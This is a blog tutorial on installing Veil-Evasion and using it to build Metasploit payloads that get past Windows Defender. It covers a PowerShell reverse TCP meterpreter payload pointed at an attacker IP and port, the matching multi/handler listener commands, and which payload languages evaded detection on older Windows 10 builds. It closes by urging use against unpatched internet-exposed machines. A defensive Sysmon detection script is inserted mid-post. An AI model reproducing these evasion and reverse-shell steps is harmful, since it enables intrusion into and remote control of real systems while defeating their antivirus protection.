Running your awesome payload and getting it shot down by antivirus software is kind of the same as having your Lamborghini’s launch control active and seeing a police car parking in front of you. It kind of spoils the concept. The Veil-Evasion framework is a great way to get rid of that digital police car and have your payloads evade detection by antivirus software. In this blog post, I give you some examples of how to use Veil and obfuscate the true intentions of your payloads.
Veil-Evasion is free to use and can be downloaded from GitHub. It is designed to generate Metasploit payloads that bypass common antivirus solutions. It is not a complex tool to use and that makes it very powerful. Windows Defender is one of those solutions. It is present on Windows clients and servers by default, which is where some bypassing techniques really come in handy. Since it is installed by default, keep in mind that it will easily block commonly used payloads which do not use obfuscation techniques.
Veil-Evasion framework installation on Kali Linux
For this blog post, I will install Veil-Evasion on my newly deployed Kali Linux VM. Make sure that you install the new Veil 3, not the older one based on Python 2.7, since that version is end of life.
apt-get install veil -y
With the framework downloaded via apt, I can now start installing Veil and the necessary components. The install script is launched automatically when you start Veil. After that, you only have to proceed by choosing ‘y’.
After installing Wine and some other components, the installer will prompt you to install Python. Just use the default settings (next->next->finish) for this and let it run. The same will occur for PyWin and PyCrypto.
If there are any errors during the installation, you can always rerun the installation script manually. This fixed some configuration issues with Wine for me. If all went well, you can skip the command below.
/usr/share/veil/config/setup.sh --force --silent
When the installation of Veil is finished you can start it by typing ‘veil’.
Run the update command frequently so that your copy of Veil has the latest updates. Now it’s time to see what Veil has to offer out of the box.
With the list command you can see which tools are available to use. In my case, it’s just installed and I have two options: Evasion and Ordnance.
- Evasion: create payloads that evade detection by antivirus software
- Ordnance: generate shellcode for supported payloads.
Since this blog post focuses on using evasion techniques based on Veil, I will use the first module. The use command selects the tool you want, followed by the ID or name of the tool.
Selecting Evasion as my tool shows a new submenu from which I can proceed to list the loaded payloads. In my installation there are 41 payloads loaded.
The list command shows the available payloads to choose from. There are a few payloads per programming language to fit your needs.
Let’s take an easy example for a Microsoft Windows 10 client and use powershell/meterpreter/rev_tcp.py. You select a payload with the use command followed by the ID of the payload.
Now that the payload I want to use is selected, it’s time to set the parameters and make sure it knows where to connect to. So I configure the LHOST and LPORT with the IP of my attacker machine and the port I will use for the Metasploit listener. Since we are playing hacker today, let’s use 1337 for the LPORT and my current IP address for the LHOST. This is done using the set command.
set lport 1337
set lhost 192.168.1.4
Now that all parameters are set, it’s only a matter of invoking the generate command to create the payload. Since PowerShell does not need to compile I can grab the code directly in /var/lib/veil/output/source/. Other languages will compile first.
Running the payload and getting the reverse shell
Before running the payload I have to make sure that there is a Metasploit listener ready to receive the incoming connection. To set up a listener, I first start Metasploit and then configure the Multi Handler exploit.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1337
set LHOST 192.168.1.4
If all works well, the reverse shell is initiated as soon as the payload starts. You will see an incoming connection in Metasploit and have a working meterpreter shell, which gives you all kinds of nice privileges.
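The defender-side view of this callback, as an added example that is not part of the original post: a reverse TCP payload makes the target open an outbound connection to LHOST:LPORT, so this script filters Sysmon Event ID 3 (network connection) records for PowerShell-initiated connections to unexpected ports. The JSON-lines export layout, the sample events and the port allowlist are assumptions constructed for illustration.

```python
import json
import ntpath

# PowerShell hosts only: the post notes its PowerShell payload runs uncompiled,
# while the other payload languages compile to executables with their own names.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Assumption: the only ports PowerShell is expected to reach directly here.
EXPECTED_PORTS = {80, 443}

# Constructed Sysmon Event ID 3 records, one JSON object per line.
# The last line is deliberately truncated to show malformed input being skipped.
SAMPLE_EVENTS = r"""
{"EventID": 3, "UtcTime": "2020-03-01 10:15:02.114", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Initiated": "true", "DestinationIp": "192.168.1.4", "DestinationPort": "1337"}
{"EventID": 3, "UtcTime": "2020-03-01 10:16:40.902", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe", "Initiated": "true", "DestinationIp": "10.0.0.20", "DestinationPort": "443"}
{"EventID": 3, "UtcTime": "2020-03-01 10:17:05.331", "Image": "C:\\Program Files\\Example\\browser.exe", "Initiated": "true", "DestinationIp": "10.0.0.30", "DestinationPort": "8443"}
{"EventID": 3, "UtcTime": "2020-03-01 10:18:11.007", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "Initiated": "false", "DestinationIp": "192.168.1.50", "DestinationPort": "5985"}
{"EventID": 3, "UtcTime": "2020-03-01 10:19
"""


def is_true(value):
    # Sysmon renders booleans as the strings "true"/"false"; accept real bools too.
    return str(value).strip().lower() == "true"


def suspicious_connections(lines):
    """Return (time, image, dest_ip, dest_port) for outbound PowerShell callbacks."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
            port = int(ev.get("DestinationPort", 0))
        except (ValueError, TypeError, AttributeError):
            continue  # truncated or malformed record
        if str(ev.get("EventID")) != "3" or not is_true(ev.get("Initiated")):
            continue  # only connections the local process opened itself
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image in SCRIPT_HOSTS and port not in EXPECTED_PORTS:
            hits.append((ev.get("UtcTime"), image, ev.get("DestinationIp"), port))
    return hits


if __name__ == "__main__":
    for hit in suspicious_connections(SAMPLE_EVENTS):
        print("outbound script-host connection:", hit)
```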
Is Veil-Evasion still valuable in today’s world?
Microsoft has really upped their game with Windows Defender to block the meterpreter payload. I have had some different results with different versions of Windows. For example, Windows 10 build 1909 with Defender enabled blocked all the different payloads I used. I tried the C, C#, Go, Perl, Python, and PowerShell payloads. All got blocked when I tried to download or run them.
So let’s try another build of Windows 10 since not everyone is always on the latest builds. I checked to see how Build 1703 is working out and it was much better. Windows Defender was running, but the machine was not updated beyond 1703. Only the C# payloads were blocked, but the Go and Ruby payloads worked like a charm. You do get a SmartScreen warning, but it does execute the meterpreter and set up the reverse TCP connection back to my attacker machine.
Does Veil-Evasion have some value as of today? Yes, I believe it has. Since there are a lot of machines running Windows 10 which are not updated to the latest build, you can still use Veil to hide your intentions. For example, Build 1607 has been end of life for a while, but you can still find them exposed to the internet. And don’t get me started about Windows 7 :)